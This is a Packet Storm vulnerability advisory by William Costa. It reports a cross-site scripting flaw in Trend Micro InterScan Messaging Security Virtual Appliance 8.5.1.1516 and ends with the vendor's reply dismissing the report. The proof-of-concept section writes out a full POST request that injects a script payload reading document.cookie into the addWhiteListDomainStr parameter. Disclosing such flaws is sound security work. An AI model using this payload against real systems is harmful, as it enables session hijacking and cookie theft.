InterScan Messaging Security Virtual Appliance version 8.5.1.1516 suffers from a cross site scripting vulnerability.
1fa2cc407ed2a82d337ba4d3cae67361db3f1a6cbca2e745fe0e6c1ced5eceb3I. VULNERABILITY
-------------------------
XSS Attacks vulnerability in InterScan Messaging Security Virtual Appliance
8.5.1.1516
II. DESCRIPTION
-------------------------
Has been detected a XSS vulnerability in InterScan Messaging Security
Virtual Appliance version 8.5.1.1516.
The code injection is done through the parameter "addWhiteListDomainStr"
send via post in the page “/addWhiteListDomain.imss”
III. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter
“addWhiteListDomainStr” correctly.
https://10.200.210.100:8445/addWhiteListDomain.imss
Host=10.200.210.100:8445
User-Agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0)
Gecko/20100101 Firefox/29.0
Accept=text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate Referer=
https://186.230.33.160/trend-interscan/trend.php
Cookie=JSESSIONID=68D4F0AEF4874173BDE77FAA4895231F; CurrentLocale=en- US;
PHPSESSID=2ok068gfak8np5isbe5k5l4nf3; un=7164ceee6266e893181da6c33936e4a4;
userID=1; LANG=en;
wids=modImsvaSystemUseageWidget,modImsvaMailsQueueWidget,modImsvaQuara
ntineWidget,modImsvaArchiveWidget,; lastID=15; theme=default; lastTab=1;
GetPageTab=1
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=95
POSTDATA=addWhiteListDomainStr=aaaa.com"><script>alert(document.cookie
);</script>)
https://vimeo.com/96757096
IV. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted user's
browser, that allows the execution of arbitrary HTML/script code to be
executed in the context of the victim user's browser allowing session
hijacking.
V. SYSTEMS AFFECTED
-------------------------
Tested in InterScan Messaging Security Virtual Appliance 8.5.1.1516
VI. SOLUTION
------------------------
Answer from Trend.
Hi William,
According to our Product Developers, this is not vulnerability of our
product. All of the cookies(not just IMSVA) can be stolen from a
compromised environment. It was highly suggested that you upgrade your
client to ensure safety.
Also, they recommended another Trend Micro Product -"OfficeScan" that may
be suitable for your environment.
I hope this information helps. Please let me know if you have additional
questions or clarifications.
Have a great day!
By William Costa
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed